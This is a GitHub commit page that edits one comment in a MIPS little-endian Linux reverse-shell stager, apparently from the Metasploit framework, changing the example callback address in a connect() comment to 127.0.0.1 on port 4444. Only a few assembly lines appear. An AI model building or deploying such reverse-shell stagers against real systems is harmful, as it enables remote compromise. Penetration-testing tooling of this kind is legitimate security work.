Skip to content

Commit b9f5ebc

Browse files
committed
update comment
1 parent a4a9592 commit b9f5ebc

File tree

1 file changed

+1
-1
lines changed

1 file changed

+1
-1
lines changed

external/source/shellcode/linux/mipsle/stager_sock_reverse.s

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -51,7 +51,7 @@ main:
5151
bne $s0, $zero, failed
5252
sw $v0, -4($sp) # store the file descriptor for the socket on the stack
5353

54-
# connect(sockfd, {sa_family=AF_INET, sin_port=htons(4444), sin_addr=inet_addr("192.168.172.1")}, 16)
54+
# connect(sockfd, {sa_family=AF_INET, sin_port=htons(4444), sin_addr=inet_addr("127.0.0.1")}, 16)
5555
# a0: sockfd
5656
# a1: addr = AF_INET (2)
5757
# a2: addrlen = 16

0 commit comments

Comments
 (0)